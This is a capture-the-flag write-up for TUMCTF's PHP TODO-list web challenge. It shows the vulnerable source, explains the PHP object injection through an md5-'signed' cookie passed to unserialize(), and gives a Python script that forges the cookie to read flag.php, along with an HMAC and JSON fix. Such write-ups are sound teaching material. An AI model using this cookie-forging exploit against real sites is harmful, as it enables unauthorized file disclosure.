web / free_as_in_bavarian_beer (TUMCTF)

The 2-day pentest of #dientaphcm.vn finished with no highlights. My brain feels very tired, so in this TUMCTF I only tried one challenge, in the Web category.


A basic POST and a basic XSS.


But it seems impossible to exploit anything from this bug ^.^ because of the hint "flag is in flag.php", so we certainly need to read the source code of flag.php.

Something available on this site (via the ?source link):

<? // something spam in license.txt ?>

<?php
// Source of the TODO page as served by ?source. The license.txt dump that
// highlight_file() prints first is abbreviated by the line above. The braces
// and isset() guards were lost in extraction and are restored here; the
// unserialize() of the cookie is the challenge's own (deliberate) bug.
class GPLSourceBloater {
    public function __toString() {
        return highlight_file('license.txt', true) . highlight_file($this->source, true);
    }
}

if (isset($_GET['source'])) {
    $s = new GPLSourceBloater();
    $s->source = __FILE__;
    echo $s;          // echo on an object calls __toString()
    exit;
}

$todos = [];

if (isset($_COOKIE['todos'])) {
    $c = $_COOKIE['todos'];
    $h = substr($c, 0, 32);   // "signature": an unkeyed md5 anyone can compute
    $m = substr($c, 32);      // serialized todo array

    if (md5($m) === $h) {
        $todos = unserialize($m);   // attacker-controlled data into unserialize()
    }
}

if (isset($_POST['text'])) {
    $todo = $_POST['text'];
    $todos[] = $todo;
    $m = serialize($todos);
    $h = md5($m);

    setcookie('todos', $h . $m);

    header('Location: ' . $_SERVER['REQUEST_URI']);
    exit;
}
?>
<style>
* {font-family: "Comic Sans MS", cursive, sans-serif}
</style>

<h1>My open/libre/free/PHP/Linux/systemd/GNU TODO List</h1>
<a href="?source"><h2>It's super secure, see for yourself</h2></a>
<?php foreach($todos as $todo):?>
<p><?= $todo ?></p>   <!-- echoed unescaped (the "basic XSS"); an object here hits __toString() -->
<?php endforeach;?>

<form method="post" href=".">
<textarea name="text"></textarea>
<input type="submit" value="store">
</form>

I tried to read the source in spite of being tired.

Something happened in my brain:

What is "<? // something spam in license.txt ?>" used for? Does this help us read the source? 😀

So class GPLSourceBloater does!!!

I tried Google and found http://php.net/manual/en/language.oop5.magic.php

Magic methods are called automatically by PHP on an object: __toString() runs whenever the object is converted to a string, for example by echo.

The idea in this case is to construct a GPLSourceBloater object whose source property points at flag.php.

And object injection (the cookie is passed straight to unserialize()) lets us do this.

After a POST I get a cookie built like setcookie('todos', md5($m).$m); # $m is the serialized todo array.

To understand the payload below you must have PHP's serialize() format in your head.


To construct a GPLSourceBloater object, I design the cookie like a serialized object,

which must contain a source="flag.php" element.


But it printed this:


Yup, it must be an array containing the object to print this source: the page treats $todos as an array ($todos[] = $todo, foreach) and echoes each element, and that echo is what triggers __toString().
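The cookie construction from the two steps above, as an added example (not the write-up's own script). It builds the serialized GPLSourceBloater object, wraps it in an array, prefixes the md5 the challenge expects, and shows why that prefix is no protection: the same function that forges the value passes the server's check, while a keyed HMAC (this example's own addition, not in the challenge) rejects it. Class and property names come from the page's source listing; the function names, the hypothetical secret and the HMAC variant are assumptions of this example.

```python
"""Forge the 'todos' cookie for the GPLSourceBloater challenge (added example,
not the write-up's code). Class/property names are from the page's listing;
function names, the HMAC variant and the key are this example's own."""
import hashlib
import hmac
from urllib.parse import quote


class PhpObject:
    """A PHP object to be emitted as O:<len>:"<class>":<n>:{...}."""

    def __init__(self, cls, **props):
        self.cls = cls
        self.props = props


def php_serialize(value):
    """Serialize a Python value in PHP's serialize() format.

    Handles None, bool, int, str, list (PHP array with integer keys), dict and
    PhpObject. String lengths are byte lengths, as PHP counts them."""
    if value is None:
        return "N;"
    if isinstance(value, bool):
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode()), value)
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.cls.encode()), value.cls, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def make_cookie(payload):
    """Build the cookie exactly as the page does: md5($m) . $m.
    The 'signature' is an unkeyed hash, so the attacker computes it too."""
    m = php_serialize(payload)
    return hashlib.md5(m.encode()).hexdigest() + m


def cookie_header_value(cookie):
    """The value to put in the Cookie: header. PHP's setcookie() URL-encodes
    values and $_COOKIE decodes them; the ';' and '"' in the payload would
    otherwise break cookie parsing."""
    return quote(cookie, safe="")


def server_accepts_md5(cookie):
    """Mimic the challenge's check: md5(substr($c, 32)) === substr($c, 0, 32)."""
    h, m = cookie[:32], cookie[32:]
    return hashlib.md5(m.encode()).hexdigest() == h


def make_cookie_hmac(payload, key):
    """Hypothetical fixed version: a keyed MAC over the serialized data."""
    m = php_serialize(payload)
    return hmac.new(key, m.encode(), hashlib.sha256).hexdigest() + m


def server_accepts_hmac(cookie, key):
    """Check for the fixed version; a forger without the key cannot pass it."""
    h, m = cookie[:64], cookie[64:]
    expected = hmac.new(key, m.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, h)


# The object alone: unserialize() returns it, but the page expects an array,
# which is why the first attempt did not print the source.
bloater = PhpObject("GPLSourceBloater", source="flag.php")
BARE_OBJECT_COOKIE = make_cookie(bloater)

# The array containing the object: foreach echoes it, echo calls __toString(),
# and __toString() runs highlight_file('flag.php').
EXPLOIT_COOKIE = make_cookie([bloater])

if __name__ == "__main__":
    print("Cookie: todos=" + cookie_header_value(EXPLOIT_COOKIE))
```

Send the printed header with a plain GET (no POST is needed: the cookie is unserialized before the $_POST branch, and the foreach does the rest). Even the HMAC variant only fixes the forgery; feeding unserialize() any data a client can shape is the actual bug, and the page should store the todo list as JSON and json_decode() it instead.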


And I got the flag.


Done!! Good night, reader!!

